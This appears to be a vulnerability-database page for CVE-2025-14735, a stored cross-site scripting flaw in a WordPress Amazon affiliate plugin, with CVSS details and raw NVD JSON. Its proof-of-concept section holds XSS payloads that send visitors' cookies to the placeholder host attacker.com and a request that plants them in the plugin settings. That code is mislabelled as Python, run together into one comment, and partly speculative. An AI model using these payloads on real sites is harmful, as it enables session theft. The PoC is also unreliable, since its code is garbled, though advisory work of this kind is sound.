Security Vulnerability Report
中文
CVE-2025-14735 CVSS 4.4 MEDIUM

CVE-2025-14735

Published: 2025-12-20 04:16:09
Last Modified: 2026-04-15 00:35:42

Description

The "Amazon affiliate lite Plugin" plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.

CVSS Details

CVSS Score
4.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WordPress Amazon affiliate lite Plugin <= 1.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-14735 PoC - Stored XSS in Amazon Affiliate Lite Plugin // Requires administrator privileges // Method 1: Via plugin settings injection // Inject XSS payload in plugin settings fields (e.g., Affiliate ID field) const xssPayload = '<script>document.location="https://attacker.com/steal?c="+document.cookie</script>'; // Method 2: HTTP POST request to trigger XSS const pocRequest = { method: 'POST', url: '/wp-admin/admin.php?page=afiliados-de-amazon-lite-settings', headers: { 'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': document.cookie // Valid admin session required }, body: 'action=save_settings&afiliado_id=' + encodeURIComponent(xssPayload) + '&submit=Save' }; // Method 3: Direct database injection (if SQL injection exists) // INSERT INTO wp_options (option_name, option_value) VALUES ('afiliados_amazon_settings', '<script>alert("XSS")</script>'); // Detection payload - triggers when admin accesses settings page const detectionPayload = '<img src=x onerror="fetch(\'/wp-admin/admin-ajax.php?action=store_xss\',{method:\'POST\',body:document.cookie})\'">';

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14735", "sourceIdentifier": "[email protected]", "published": "2025-12-20T04:16:08.613", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The \"Amazon affiliate lite Plugin\" plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-80"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/afiliados-de-amazon-lite/trunk/ADAL-core.php?rev=1952216#L105", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/afiliados-de-amazon-lite/trunk/ADAL-core.php?rev=1952216#L236", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0c23cc3c-3c76-4ba8-8fa6-6ed0507a35c9?source=cve", "source": "[email protected]"}]}}